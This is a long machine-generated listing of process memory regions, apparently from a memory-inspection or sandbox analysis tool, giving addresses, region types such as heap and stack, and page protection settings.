page read and write
200243D9000
heap
page read and write
2DAF000
stack
page read and write
207E009D000
heap
page read and write
201BCB21000
trusted library allocation
page read and write
A05000
heap
page read and write
1C974630000
heap
page read and write
7FF848D20000
trusted library allocation
page read and write
F60000
heap
page read and write
7FF848CB7000
trusted library allocation
page read and write
F7EA1FE000
stack
page read and write
2BFB7520000
heap
page execute and read and write
1D99EFDF000
heap
page read and write
7FF848B20000
trusted library allocation
page read and write
207D3194000
heap
page read and write
222345B0000
heap
page read and write
7FF848C06000
trusted library allocation
page execute and read and write
1B0E0000
heap
page execute and read and write
12E13000
trusted library allocation
page read and write
1D99E9A2000
heap
page read and write
207DCC80000
trusted library allocation
page read and write
1D463C90000
heap
page read and write
7FF848BF0000
trusted library allocation
page execute and read and write
207DEF8A000
heap
page read and write
7FF848CB4000
trusted library allocation
page read and write
14630329000
heap
page read and write
207DCFE0000
heap
page read and write
1D99E898000
heap
page read and write
146358C3000
heap
page read and write
207E0092000
heap
page read and write
2BF9EB30000
heap
page read and write
F7EB4FA000
stack
page read and write
5B6E17E000
stack
page read and write
207DDFA0000
trusted library allocation
page read and write
2EF88FE000
stack
page read and write
7FF848D40000
trusted library allocation
page read and write
2BF9CE10000
heap
page read and write
207DEFE6000
heap
page read and write
7FF848CD0000
trusted library allocation
page execute and read and write
F7EA2F5000
stack
page read and write
207DCA9C000
heap
page read and write
207DCC78000
unkown
page readonly
207DCF59000
heap
page read and write
2003E7BA000
heap
page read and write
207E0050000
heap
page read and write
24E97F70000
heap
page read and write
1D99E790000
heap
page read and write
F7EB8F9000
stack
page read and write
247D7DA8000
heap
page read and write
7FF848B3D000
trusted library allocation
page execute and read and write
1C9744E0000
trusted library allocation
page read and write
1DA7CC22000
heap
page read and write
1E9E2114000
heap
page read and write
1D47DD3A000
heap
page read and write
1B06F000
stack
page read and write
1D99E7F3000
heap
page read and write
1C97255B000
heap
page read and write
1D465900000
heap
page read and write
981E4FE000
stack
page read and write
1AFCF000
stack
page read and write
207DC750000
trusted library allocation
page read and write
2003E668000
heap
page read and write
F7EC8F9000
stack
page read and write
7FF848E70000
trusted library allocation
page read and write
207E00E6000
heap
page read and write
2E00000
heap
page execute and read and write
7FF848F20000
trusted library allocation
page read and write
207DEFEC000
heap
page read and write
201AB0A3000
heap
page read and write
207DD870000
trusted library allocation
page read and write
201C527A000
heap
page read and write
1C972547000
heap
page read and write
146358F2000
heap
page read and write
D07A079000
stack
page read and write
1D99EFCD000
heap
page read and write
1DA7D408000
heap
page read and write
7FF848B14000
trusted library allocation
page read and write
207DCC7E000
unkown
page read and write
207E0113000
heap
page read and write
7FF848D09000
trusted library allocation
page read and write
1D99E895000
heap
page read and write
1AC8C7A2000
unkown
page readonly
7FF848CB2000
trusted library allocation
page read and write
207DE255000
heap
page read and write
1DA6599C000
trusted library allocation
page read and write
9FE000
heap
page read and write
7FF848E60000
trusted library allocation
page read and write
DCE000
stack
page read and write
1D99F001000
heap
page read and write
1C7F0000
heap
page read and write
14635800000
heap
page read and write
201ACB01000
trusted library allocation
page read and write
1E9E41F1000
heap
page read and write
1E9E3FE0000
heap
page read and write
1D463E00000
heap
page readonly
C4BEFFF000
stack
page read and write
207DEE00000
heap
page read and write
7FF848DE0000
trusted library allocation
page read and write
1DA7D0F3000
heap
page read and write
207DD780000
trusted library allocation
page read and write
207DE000000
heap
page read and write
207DE287000
heap
page read and write
1E9E5746000
heap
page read and write
5E0000
heap
page read and write
207DCFCA000
heap
page read and write
1DA630B7000
heap
page read and write
201BCF19000
trusted library allocation
page read and write
7FF848CC0000
trusted library allocation
page read and write
207DD79A000
unkown
page readonly
7FF848F80000
trusted library allocation
page read and write
22234720000
heap
page read and write
1B690000
heap
page read and write
7FF848CC2000
trusted library allocation
page read and write
1DA63300000
heap
page read and write
2BFAEB43000
trusted library allocation
page read and write
4B1D000
trusted library allocation
page read and write
207DE389000
heap
page read and write
7FF848D70000
trusted library allocation
page read and write
207E00C5000
heap
page read and write
207DCF6B000
heap
page read and write
207E0254000
heap
page read and write
207D315E000
heap
page read and write
7FF848B34000
trusted library allocation
page read and write
207DDC22000
heap
page read and write
222345EC000
heap
page read and write
7FF848E5C000
trusted library allocation
page read and write
1D99E88B000
heap
page read and write
5B6F40E000
stack
page read and write
207DC690000
trusted library allocation
page read and write
1D99E897000
heap
page read and write
207DE6C7000
heap
page read and write
201C5356000
heap
page read and write
207E0302000
heap
page read and write
21EFAFD000
stack
page read and write
2BF9CD80000
unkown
page readonly
1AC8E626000
trusted library allocation
page read and write
207D5D95000
heap
page read and write
201AD552000
trusted library allocation
page read and write
7FF848B20000
trusted library allocation
page read and write
7FF848F60000
trusted library allocation
page read and write
1D99E9F3000
heap
page read and write
7A0000
heap
page read and write
7FF848D20000
trusted library allocation
page execute and read and write
7FF848E20000
trusted library allocation
page read and write
207DE2B3000
heap
page read and write
E88000
heap
page read and write
1D99E760000
heap
page read and write
207D0C99000
heap
page read and write
207DE7CB000
heap
page read and write
A1C000
heap
page read and write
1C976440000
heap
page read and write
7FF848DF0000
trusted library allocation
page read and write
7FF848D60000
trusted library allocation
page read and write
7FF848B03000
trusted library allocation
page execute and read and write
201ADE3F000
trusted library allocation
page read and write
7FF848D40000
trusted library allocation
page read and write
9EC000
heap
page read and write
7FF789DB1000
unkown
page execute read
7FF848D00000
trusted library allocation
page execute and read and write
1D4658B0000
heap
page execute and read and write
1D99E9B1000
heap
page read and write
B30000
trusted library allocation
page read and write
537B000
trusted library allocation
page read and write
207D3184000
heap
page read and write
1D99EF54000
heap
page read and write
1B490000
heap
page execute and read and write
7FF848B20000
trusted library allocation
page read and write
222345DB000
heap
page read and write
1ADFC000
heap
page read and write
201C53A9000
heap
page read and write
7FF848EF3000
trusted library allocation
page read and write
1C9728AE000
heap
page read and write
532F000
trusted library allocation
page read and write
1B6FC000
heap
page read and write
4F455FE000
stack
page read and write
1D99E8A9000
heap
page read and write
1C39B000
heap
page read and write
207DCA00000
heap
page read and write
1B98A000
stack
page read and write
1DA659D7000
trusted library allocation
page read and write
20025C00000
heap
page read and write
2BF9D0B3000
trusted library allocation
page read and write
1D99F013000
heap
page read and write
1D99E7C5000
heap
page read and write
207DE378000
heap
page read and write
1D99EF32000
heap
page read and write
207DE144000
heap
page read and write
7FF848B30000
trusted library allocation
page read and write
247BF475000
trusted library allocation
page read and write
207DC9D0000
trusted library allocation
page read and write
207DC5E0000
trusted library allocation
page read and write
53D3000
trusted library allocation
page read and write
20025D84000
heap
page read and write
1C972410000
heap
page read and write
1C1F0000
unclassified section
page readonly
7FF848F63000
trusted library allocation
page read and write
207DC310000
trusted library allocation
page read and write
146358FF000
heap
page read and write
7FF848F46000
trusted library allocation
page read and write
1D42D000
stack
page read and write
207DD7F0000
unkown
page readonly
207DEC16000
unkown
page readonly
1D99E85B000
heap
page read and write
1D99EA5D000
heap
page read and write
1E9E20A8000
heap
page read and write
201AAFF4000
heap
page read and write
207D318E000
heap
page read and write
1DA7D0BF000
heap
page read and write
1C9725AC000
heap
page read and write
1D99E7EE000
heap
page read and write
207DCAD2000
heap
page read and write
207DC650000
trusted library allocation
page read and write
207D5D35000
heap
page read and write
247D7D20000
heap
page read and write
12693000
trusted library allocation
page read and write
4969000
trusted library allocation
page read and write
207DD790000
unkown
page readonly
1DA7D070000
heap
page read and write
BAB5CFE000
stack
page read and write
7FF848C20000
trusted library allocation
page execute and read and write
207E0243000
heap
page read and write
52F1000
trusted library allocation
page read and write
7FF848E70000
trusted library allocation
page read and write
7FF789E1F000
unkown
page write copy
7FF848D10000
trusted library allocation
page read and write
7FF848B04000
trusted library allocation
page read and write
1D47DC80000
heap
page read and write
5B6E0FE000
stack
page read and write
201C53BA000
heap
page read and write
F70000
heap
page execute and read and write
1D99E7D1000
heap
page read and write
207DEFBD000
heap
page read and write
207DD8F0000
trusted library allocation
page read and write
1AAA3000
trusted library allocation
page read and write
7FF848E80000
trusted library allocation
page read and write
7FF848E80000
trusted library allocation
page read and write
207DC730000
trusted library allocation
page read and write
207D0D5F000
heap
page read and write
1D463DD0000
trusted library allocation
page read and write
2BF9CE8F000
heap
page read and write
20027269000
trusted library allocation
page read and write
201AE453000
trusted library allocation
page read and write
CFF000
heap
page read and write
1DA7D4AD000
heap
page read and write
A45000
heap
page read and write
1DA64E48000
trusted library allocation
page read and write
2BF9D0D0000
heap
page execute and read and write
7FF848F40000
trusted library allocation
page read and write
1463027C000
heap
page read and write
1D99EF54000
heap
page read and write
1C9724F0000
heap
page read and write
7FF848BAC000
trusted library allocation
page execute and read and write
201ADA9F000
trusted library allocation
page read and write
207DC5E0000
trusted library allocation
page read and write
1C97254F000
heap
page read and write
7FF848D20000
trusted library allocation
page execute and read and write
207E04A0000
heap
page read and write
207DCC60000
trusted library allocation
page read and write
207DC6C0000
trusted library allocation
page read and write
5B6F20C000
stack
page read and write
1D4670C7000
trusted library allocation
page read and write
207E048F000
heap
page read and write
7FF848C16000
trusted library allocation
page execute and read and write
52FD000
trusted library allocation
page read and write
207DE68A000
heap
page read and write
20025CD0000
heap
page read and write
201ADBC1000
trusted library allocation
page read and write
207E0343000
heap
page read and write
207DC9E0000
trusted library allocation
page read and write
1C97255B000
heap
page read and write
1E9E20BA000
heap
page read and write
4F451FD000
stack
page read and write
12948000
trusted library allocation
page read and write
7FF848B1B000
trusted library allocation
page read and write
D0C000
heap
page read and write
204A67F000
stack
page read and write
1DA7D432000
heap
page read and write
7FF848D30000
trusted library allocation
page read and write
7FF848E50000
trusted library allocation
page read and write
1E9E1F60000
heap
page read and write
207DD67C000
unkown
page read and write
7FF848CB1000
trusted library allocation
page read and write
1D99E9C1000
heap
page read and write
1D467294000
trusted library allocation
page read and write
F7EC6FD000
stack
page read and write
CD0000
heap
page read and write
F7ED9FF000
stack
page read and write
9CA89F9000
stack
page read and write
207DEF9D000
heap
page read and write
1E9E20C2000
heap
page read and write
1DA633A4000
heap
page read and write
7FF848BF6000
trusted library allocation
page execute and read and write
146300F0000
heap
page read and write
2930000
heap
page execute and read and write
14630A00000
heap
page read and write
2003E6EF000
heap
page read and write
E5F000
stack
page read and write
207DD638000
unkown
page readonly
1AC2D000
stack
page read and write
207DCF70000
heap
page read and write
7FF848D08000
trusted library allocation
page read and write
BDE000
heap
page read and write
1D99E899000
heap
page read and write
AF1000
stack
page read and write
1E9E6392000
heap
page read and write
7FF848D30000
trusted library allocation
page read and write
1D99E7D0000
heap
page read and write
207D5A90000
trusted library allocation
page read and write
7FF848CF0000
trusted library allocation
page execute and read and write
207DC7C0000
trusted library allocation
page read and write
7FF848DA0000
trusted library allocation
page read and write
207DD58E000
heap
page read and write
20027202000
trusted library allocation
page read and write
1D99E818000
heap
page read and write
201AC960000
trusted library allocation
page read and write
1AC8C7A0000
unkown
page readonly
1D99E9D4000
heap
page read and write
7FF848B20000
trusted library allocation
page read and write
7FF848BD6000
trusted library allocation
page read and write
207D31A6000
heap
page read and write
24E97F90000
heap
page read and write
A16000
heap
page read and write
1DA664B3000
trusted library allocation
page read and write
BAB53EF000
stack
page read and write
1D4656D7000
heap
page execute and read and write
14630278000
heap
page read and write
1E9E2162000
heap
page read and write
1D99E8A9000
heap
page read and write
1D99E826000
heap
page read and write
207D5AD8000
trusted library allocation
page read and write
2223466D000
heap
page read and write
201BCDF2000
trusted library allocation
page read and write
207D0C96000
heap
page read and write
2EF87FE000
stack
page read and write
B40000
heap
page read and write
525C000
trusted library allocation
page read and write
5315000
trusted library allocation
page read and write
1D99EF10000
heap
page read and write
F7ECAFC000
stack
page read and write
207DD400000
heap
page read and write
1D99EF66000
heap
page read and write
201AB036000
heap
page read and write
7FF848AF3000
trusted library allocation
page execute and read and write
207DDF80000
remote allocation
page read and write
7FF848E78000
trusted library allocation
page read and write
247BD6F2000
unkown
page readonly
7FF848BC0000
trusted library allocation
page read and write
1DA63380000
heap
page read and write
1D99E7C0000
heap
page read and write
BAB5EFD000
stack
page read and write
1D466C83000
trusted library allocation
page read and write
1E9E20DE000
heap
page read and write
201C5045000
heap
page read and write
101B000
heap
page read and write
7FF848CE0000
trusted library allocation
page execute and read and write
7FF789DB0000
unkown
page readonly
207DD8A2000
unkown
page read and write
7FF637390000
unkown
page readonly
1B7DF000
stack
page read and write
1D99E8A9000
heap
page read and write
2BFB72A0000
heap
page read and write
7FF848D10000
trusted library allocation
page read and write
1B4BE000
stack
page read and write
BAB5AFC000
stack
page read and write
2951000
trusted library allocation
page read and write
7FF848E58000
trusted library allocation
page read and write
207DCB2A000
heap
page read and write
7FF848F20000
trusted library allocation
page read and write
1E9E21B0000
heap
page read and write
1E9E2113000
heap
page read and write
F94000
heap
page read and write
7FF848B12000
trusted library allocation
page read and write
201C501F000
heap
page read and write
9CA8CFE000
stack
page read and write
1C442000
heap
page read and write
247BD7BA000
unkown
page readonly
207E008D000
heap
page read and write
207DD672000
unkown
page readonly
2EF76BB000
stack
page read and write
22234681000
heap
page read and write
1DA63042000
heap
page read and write
207DD7A0000
trusted library allocation
page read and write
C9F000
heap
page read and write
1D99E7CB000
heap
page read and write
207DD640000
trusted library allocation
page read and write
F7ED4F9000
stack
page read and write
207DE323000
heap
page read and write
539C000
trusted library allocation
page read and write
1BB8C000
stack
page read and write
207D0C2B000
heap
page read and write
1E9E211D000
heap
page read and write
201AE924000
trusted library allocation
page read and write
D0A000
heap
page read and write
207D5E10000
trusted library section
page readonly
1D99EA73000
heap
page read and write
1D99E80E000
heap
page read and write
1DA64C21000
trusted library allocation
page read and write
2BF9D030000
heap
page read and write
12941000
trusted library allocation
page read and write
1AC2E000
stack
page read and write
7FF848CE0000
trusted library allocation
page read and write
1D99E897000
heap
page read and write
200271D2000
trusted library allocation
page read and write
9C6EFFF000
stack
page read and write
7FF6373EB000
unkown
page write copy
14635902000
heap
page read and write
207DDC24000
heap
page read and write
207DEF9D000
heap
page read and write
207DD640000
trusted library allocation
page read and write
1D99E8A9000
heap
page read and write
9CA887E000
stack
page read and write
207DC8A0000
trusted library allocation
page read and write
207DC8C0000
trusted library allocation
page read and write
207DCF6E000
heap
page read and write
7FF848D40000
trusted library allocation
page read and write
12691000
trusted library allocation
page read and write
1B4D0000
heap
page execute and read and write
7FF848B1D000
trusted library allocation
page execute and read and write
D7E000
stack
page read and write
1DA64C10000
heap
page execute and read and write
247BDAD0000
trusted library allocation
page read and write
1D99EA06000
heap
page read and write
1C97254B000
heap
page read and write
207DC7C6000
unkown
page readonly
14635690000
trusted library allocation
page read and write
1463590C000
heap
page read and write
21EFDFE000
stack
page read and write
1D4666BE000
trusted library allocation
page read and write
7FF848B3B000
trusted library allocation
page execute and read and write
207E002F000
heap
page read and write
1AC8E604000
trusted library allocation
page read and write
B90000
trusted library allocation
page read and write
7FF848DC0000
trusted library allocation
page read and write
1079000
heap
page read and write
1E9E20A4000
heap
page read and write
7FF848B00000
trusted library allocation
page read and write
9CA99CC000
stack
page read and write
20026E9E000
trusted library allocation
page read and write
7FF848AF4000
trusted library allocation
page read and write
1D99E7B8000
heap
page read and write
207E0434000
heap
page read and write
E5D000
heap
page read and write
207DCB4B000
heap
page read and write
207DC7A0000
trusted library allocation
page read and write
207D5E30000
trusted library section
page readonly
2EF927E000
unkown
page readonly
1E9E20AD000
heap
page read and write
204A6F7000
stack
page read and write
1D99F072000
heap
page read and write
F7EBBFE000
stack
page read and write
BAB62FF000
stack
page read and write
204AB7B000
stack
page read and write
7FF848B50000
trusted library allocation
page read and write
201ADD52000
trusted library allocation
page read and write
7FF848B14000
trusted library allocation
page read and write
207D5C12000
heap
page read and write
207DEFB5000
heap
page read and write
F7ECFFD000
stack
page read and write
1C9728A4000
heap
page read and write
1B2DE000
stack
page read and write
20035F95000
trusted library allocation
page read and write
D07AF4E000
stack
page read and write
207DE32F000
heap
page read and write
F7EAAFA000
stack
page read and write
1E9E6495000
heap
page read and write
1D99EF22000
heap
page read and write
1E9E2140000
heap
page read and write
1D99EA61000
heap
page read and write
7FF848CD0000
trusted library allocation
page execute and read and write
51AE000
trusted library allocation
page read and write
24E98184000
heap
page read and write
7FF848B34000
trusted library allocation
page read and write
1DA7D328000
heap
page read and write
22234676000
heap
page read and write
5C0000
heap
page read and write
1AC8E617000
trusted library allocation
page read and write
1D99E89F000
heap
page read and write
34C9000
trusted library allocation
page read and write
1AC8E5E4000
trusted library allocation
page read and write
201AB120000
heap
page readonly
207DD8D0000
trusted library allocation
page read and write
207DE3D5000
heap
page read and write
FA0000
trusted library allocation
page read and write
1D99E899000
heap
page read and write
9CA9A4E000
stack
page read and write
7FF848D30000
trusted library allocation
page read and write
7FF848E90000
trusted library allocation
page read and write
54A4000
trusted library allocation
page read and write
107F000
heap
page read and write
207DE37A000
heap
page read and write
541000
stack
page read and write
1E9E20CD000
heap
page read and write
5383000
trusted library allocation
page read and write
1AC8CA63000
heap
page read and write
7FF848B04000
trusted library allocation
page read and write
7FF848D20000
trusted library allocation
page read and write
204A9FE000
stack
page read and write
7FF848DB0000
trusted library allocation
page read and write
7FF848CB2000
trusted library allocation
page read and write
4F454FE000
stack
page read and write
1C805000
heap
page read and write
2003E2A2000
heap
page read and write
F7EA3FC000
stack
page read and write
1D99E893000
heap
page read and write
2853000
trusted library allocation
page read and write
7FF848C30000
trusted library allocation
page execute and read and write
C9C000
heap
page read and write
1D99E89F000
heap
page read and write
1D99EE86000
heap
page read and write
548A000
trusted library allocation
page read and write
539E000
trusted library allocation
page read and write
22234570000
heap
page read and write
1245000
heap
page read and write
284E000
stack
page read and write
1D99E852000
heap
page read and write
12A41000
trusted library allocation
page read and write
1D99E8A9000
heap
page read and write
201AE904000
trusted library allocation
page read and write
207DCFA3000
heap
page read and write
1E9E20C4000
heap
page read and write
207DE349000
heap
page read and write
207DCC50000
trusted library allocation
page read and write
7FF848CD8000
trusted library allocation
page read and write
1DA7D468000
heap
page read and write
207DD620000
trusted library allocation
page read and write
5A0000
heap
page read and write
201AD989000
trusted library allocation
page read and write
207DCE02000
heap
page read and write
2EF887E000
unkown
page readonly
7FF848F60000
trusted library allocation
page read and write
22234682000
heap
page read and write
496C000
trusted library allocation
page read and write
207D31BE000
heap
page read and write
201AAFF2000
heap
page read and write
5B6E538000
stack
page read and write
207DC540000
trusted library allocation
page read and write
1D99EEEE000
heap
page read and write
201BCB01000
trusted library allocation
page read and write
207DD475000
heap
page read and write
247BF430000
trusted library allocation
page read and write
BE0000
heap
page read and write
C4BECF5000
stack
page read and write
7FF848BD0000
trusted library allocation
page read and write
B70000
heap
page read and write
7FF848D90000
trusted library allocation
page read and write
1D63B000
heap
page read and write
5300000
trusted library allocation
page read and write
1B960000
heap
page execute and read and write
207DE31D000
heap
page read and write
1C972841000
trusted library allocation
page read and write
7DF462760000
trusted library allocation
page execute and read and write
1C398000
heap
page read and write
1D99E9F4000
heap
page read and write
134F000
stack
page read and write
1E9E42B3000
heap
page read and write
207DE7DC000
heap
page read and write
7DF4914B0000
trusted library allocation
page execute and read and write
2BF9D0B0000
trusted library allocation
page read and write
207E0100000
heap
page read and write
207DDFC0000
unkown
page read and write
1D99E8A9000
heap
page read and write
1DA63280000
heap
page read and write
1E9E4272000
heap
page read and write
1D99EA28000
heap
page read and write
2BF9D114000
heap
page read and write
F00000
trusted library allocation
page read and write
D07AE47000
stack
page read and write
CEB000
heap
page read and write
F7ED1FD000
stack
page read and write
1AC8E540000
heap
page read and write
247BF46A000
trusted library allocation
page read and write
7C0000
heap
page read and write
F80000
trusted library allocation
page read and write
20026DAE000
trusted library allocation
page read and write
1D99EEA8000
heap
page read and write
1D99EA15000
heap
page read and write
7FF848F40000
trusted library allocation
page read and write
11C0000
trusted library allocation
page read and write
222345E6000
heap
page read and write
207D0D13000
heap
page read and write
207DE013000
heap
page read and write
207DDD29000
heap
page read and write
7FF848C40000
trusted library allocation
page execute and read and write
2223461A000
heap
page read and write
9C6F2FD000
stack
page read and write
201AD87A000
trusted library allocation
page read and write
1D52F000
stack
page read and write
7FF848C16000
trusted library allocation
page execute and read and write
1D99EA58000
heap
page read and write
1D99F062000
heap
page read and write
14635861000
heap
page read and write
1D99E89F000
heap
page read and write
207DEE24000
heap
page read and write
201ACAF0000
heap
page read and write
207E0044000
heap
page read and write
2EF877E000
unkown
page readonly
1AC8CB60000
trusted library allocation
page read and write
1D99EE74000
heap
page read and write
770000
heap
page read and write
7FF848CAA000
trusted library allocation
page read and write
204B54E000
stack
page read and write
207DE600000
heap
page read and write
2BF9CF32000
heap
page read and write
201BCB10000
trusted library allocation
page read and write
204A4FE000
stack
page read and write
1D99E9E5000
heap
page read and write
207DEEF5000
heap
page read and write
1D99F013000
heap
page read and write
7FF848B20000
trusted library allocation
page read and write
2550000
heap
page read and write
1D99F092000
heap
page read and write
4DD3000
trusted library allocation
page read and write
207DDD91000
heap
page read and write
1D99E893000
heap
page read and write
1D99E9C2000
heap
page read and write
247BD8FB000
heap
page read and write
207DC320000
heap
page readonly
7FF848B6C000
trusted library allocation
page execute and read and write
222345FC000
heap
page read and write
1AC8E669000
trusted library allocation
page read and write
207DD8A4000
unkown
page readonly
207DC6EA000
unkown
page readonly
207DE334000
heap
page read and write
7FF848CD2000
trusted library allocation
page read and write
7FF848B4D000
trusted library allocation
page execute and read and write
D142AFF000
unkown
page read and write
1D99E7C4000
heap
page read and write
7FF848E6C000
trusted library allocation
page read and write
207D5D7E000
heap
page read and write
7FF848AF2000
trusted library allocation
page read and write
207DC310000
trusted library allocation
page read and write
207DC9C0000
trusted library allocation
page read and write
1D99F0A4000
heap
page read and write
207DCCA0000
trusted library allocation
page read and write
1AC8CA2C000
heap
page read and write
4F452FE000
stack
page read and write
1D99E9B1000
heap
page read and write
F7EBFFC000
stack
page read and write
5265000
trusted library allocation
page read and write
1C975C40000
trusted library allocation
page read and write
207DC68A000
unkown
page readonly
7FF848E8C000
trusted library allocation
page read and write
7FF848E44000
trusted library allocation
page read and write
7FF848B30000
trusted library allocation
page read and write
7FF848F30000
trusted library allocation
page read and write
F30000
heap
page read and write
FB5000
heap
page read and write
1DA65A03000
trusted library allocation
page read and write
1C97251D000
heap
page read and write
200245E4000
heap
page read and write
207DD7A6000
unkown
page readonly
207E04D2000
heap
page read and write
F7EB6FC000
stack
page read and write
24E98180000
heap
page read and write
FA5000
heap
page read and write
7FF848B7C000
trusted library allocation
page execute and read and write
201C4B01000
heap
page read and write
D07A27C000
stack
page read and write
1D99EF10000
heap
page read and write
7FF848C50000
trusted library allocation
page execute and read and write
20035F31000
trusted library allocation
page read and write
2003E734000
heap
page read and write
20026CA1000
trusted library allocation
page read and write
201AAE60000
heap
page read and write
7FF848BD0000
trusted library allocation
page execute and read and write
207DC6AE000
unkown
page readonly
146358F9000
heap
page read and write
7FF848D10000
trusted library allocation
page execute and read and write
7FF848E70000
trusted library allocation
page read and write
1D99EA5D000
heap
page read and write
1E9E20C4000
heap
page read and write
207DE299000
heap
page read and write
204B7CE000
stack
page read and write
2002723A000
trusted library allocation
page read and write
207DD768000
unkown
page read and write
9C6F3FC000
stack
page read and write
7FF848B3D000
trusted library allocation
page execute and read and write
1D99E895000
heap
page read and write
7FF848F76000
trusted library allocation
page read and write
5B6E73E000
stack
page read and write
5A0000
heap
page read and write
9CA88F7000
stack
page read and write
2EF9EFE000
stack
page read and write
20027107000
trusted library allocation
page read and write
207DE1FC000
heap
page read and write
7FF848B24000
trusted library allocation
page read and write
1D463D35000
heap
page read and write
1D99E9D4000
heap
page read and write
2223461A000
heap
page read and write
533E000
trusted library allocation
page read and write
FB6000
heap
page read and write
52E1000
trusted library allocation
page read and write
7FF848C30000
trusted library allocation
page execute and read and write
7FF6373D8000
unkown
page readonly
7FF848CF0000
trusted library allocation
page execute and read and write
1D99E83D000
heap
page read and write
1D467721000
trusted library allocation
page read and write
204A978000
stack
page read and write
24E97F9B000
heap
page read and write
530C000
trusted library allocation
page read and write
1463581F000
heap
page read and write
7FF848F40000
trusted library allocation
page read and write
201AB110000
trusted library allocation
page read and write
210D3C20000
heap
page read and write
207DD51D000
heap
page read and write
1D99F062000
heap
page read and write
146358D6000
heap
page read and write
1AC8CB20000
heap
page read and write
7FF848CD0000
trusted library allocation
page execute and read and write
7FF848B3D000
trusted library allocation
page execute and read and write
7FF848CB4000
trusted library allocation
page read and write
2BFB7514000
heap
page read and write
1D99F075000
heap
page read and write
126A3000
trusted library allocation
page read and write
7FF848BD0000
trusted library allocation
page read and write
1C972535000
heap
page read and write
1ACA6C95000
heap
page read and write
1D467236000
trusted library allocation
page read and write
210D3C43000
heap
page read and write
7FF848D90000
trusted library allocation
page read and write
2E1C000
trusted library allocation
page read and write
7FF848B44000
trusted library allocation
page read and write
20026FBF000
trusted library allocation
page read and write
9C6F4FE000
stack
page read and write
7FF848F20000
trusted library allocation
page read and write
247BDB00000
heap
page execute and read and write
1D99EA27000
heap
page read and write
207DEFB1000
heap
page read and write
1C972420000
heap
page readonly
A18000
heap
page read and write
2223467E000
heap
page read and write
1DA7D540000
trusted library allocation
page read and write
207E020E000
heap
page read and write
1DA63310000
trusted library allocation
page read and write
1E9E4273000
heap
page read and write
D079CFE000
stack
page read and write
207DCF02000
heap
page read and write
1D47DF1B000
heap
page read and write
1D32B000
stack
page read and write
1E9E21B4000
heap
page read and write
13062000
trusted library allocation
page read and write
7FF848B1D000
trusted library allocation
page execute and read and write
1E9E5740000
trusted library allocation
page read and write
1D99EA85000
heap
page read and write
1DA650ED000
trusted library allocation
page read and write
204A5FA000
stack
page read and write
C98000
heap
page read and write
4D42000
trusted library allocation
page read and write
207E000E000
heap
page read and write
207DEFCA000
heap
page read and write
D07A37B000
stack
page read and write
2BA0000
heap
page read and write
207E0002000
heap
page read and write
207DC630000
trusted library allocation
page read and write
1D99E991000
heap
page read and write
21EFCFD000
stack
page read and write
1D99EA17000
heap
page read and write
207DDAC0000
heap
page read and write
1B40E000
stack
page read and write
207DDF80000
remote allocation
page read and write
7FF848CC2000
trusted library allocation
page read and write
7DF4AA8B0000
trusted library allocation
page execute and read and write
146302B5000
heap
page read and write
20025EF0000
heap
page execute and read and write
7FF848E10000
trusted library allocation
page read and write
207E0284000
heap
page read and write
5294000
trusted library allocation
page read and write
D079FFE000
stack
page read and write
207DE0E4000
heap
page read and write
7FF848E64000
trusted library allocation
page read and write
207DE351000
heap
page read and write
1D99EAF4000
heap
page read and write
207DEE13000
heap
page read and write
52F8000
trusted library allocation
page read and write
207D0D35000
heap
page read and write
201ADB04000
trusted library allocation
page read and write
1D99E8A9000
heap
page read and write
207DCAC3000
heap
page read and write
1D99EA58000
heap
page read and write
14635842000
heap
page read and write
247BD870000
heap
page read and write
207DD63E000
unkown
page readonly
5D5000
heap
page read and write
204A7F9000
stack
page read and write
7FF848B23000
trusted library allocation
page execute and read and write
D079C7E000
stack
page read and write
1ACA6C10000
heap
page read and write
495B000
trusted library allocation
page read and write
1DA63220000
heap
page read and write
1D99E8A9000
heap
page read and write
F7EA8FC000
stack
page read and write
207E0303000
heap
page read and write
20024200000
heap
page read and write
1463022B000
heap
page read and write
7FF848BE0000
trusted library allocation
page execute and read and write
207D0BC0000
heap
page read and write
207DD67E000
unkown
page readonly
7FF848B1D000
trusted library allocation
page execute and read and write
7FF848B0B000
trusted library allocation
page read and write
1DC72000
direct allocation
page read and write
200272EF000
trusted library allocation
page read and write
D90000
heap
page read and write
1D99E7DE000
heap
page read and write
1D99E7E8000
heap
page read and write
1B4C0000
trusted library section
page read and write
1D99E9F5000
heap
page read and write
1DA662C2000
trusted library allocation
page read and write
7FF848CF2000
trusted library allocation
page read and write
20036213000
trusted library allocation
page read and write
981EAFF000
stack
page read and write
207DE3DD000
heap
page read and write
14630295000
heap
page read and write
201AE285000
trusted library allocation
page read and write
7FF848CC0000
trusted library allocation
page read and write
1D99E88F000
heap
page read and write
207E00A6000
heap
page read and write
7FF848D0F000
trusted library allocation
page read and write
201ADC26000
trusted library allocation
page read and write
1D99E7CF000
heap
page read and write
7FF637390000
unkown
page readonly
ECF000
stack
page read and write
52E8000
trusted library allocation
page read and write
7FF848D90000
trusted library allocation
page read and write
2EF8C7E000
unkown
page readonly
24E981B0000
heap
page read and write
5B6E63E000
stack
page read and write
14635884000
heap
page read and write
7FF848E50000
trusted library allocation
page read and write
207DCDC0000
trusted library allocation
page read and write
7FF848DF0000
trusted library allocation
page read and write
207DDD8E000
heap
page read and write
14630B1A000
heap
page read and write
F40000
heap
page read and write
7FF848C06000
trusted library allocation
page execute and read and write
1D99E9A2000
heap
page read and write
7FF848D30000
trusted library allocation
page read and write
F7E97FE000
stack
page read and write
7FF848CCA000
trusted library allocation
page read and write
207E0202000
heap
page read and write
7FF848B2D000
trusted library allocation
page execute and read and write
2EF8F7E000
stack
page read and write
207D9EA0000
trusted library allocation
page read and write
146357F0000
trusted library allocation
page read and write
207D0D62000
heap
page read and write
54A6000
trusted library allocation
page read and write
207DE3E2000
heap
page read and write
1DA7D4C1000
heap
page read and write
5367000
trusted library allocation
page read and write
7FF848D30000
trusted library allocation
page read and write
1D99E828000
heap
page read and write
207DCDFE000
unkown
page readonly
1C972430000
heap
page read and write
207DD8F0000
trusted library allocation
page read and write
1D466C4F000
trusted library allocation
page read and write
F7EA5FF000
stack
page read and write
207DE6FD000
heap
page read and write
201AB00E000
heap
page read and write
146358FD000
heap
page read and write
1E9E41A1000
heap
page read and write
207DEF0E000
heap
page read and write
2EF817E000
unkown
page readonly
1D99E825000
heap
page read and write
2002708E000
trusted library allocation
page read and write
C70000
heap
page read and write
7FF848CD0000
trusted library allocation
page read and write
5B6F38C000
stack
page read and write
7FF848CF0000
trusted library allocation
page execute and read and write
F90000
heap
page read and write
EF0000
trusted library allocation
page read and write
247BD850000
heap
page read and write
207DD479000
heap
page read and write
14630213000
heap
page read and write
24E98190000
heap
page read and write
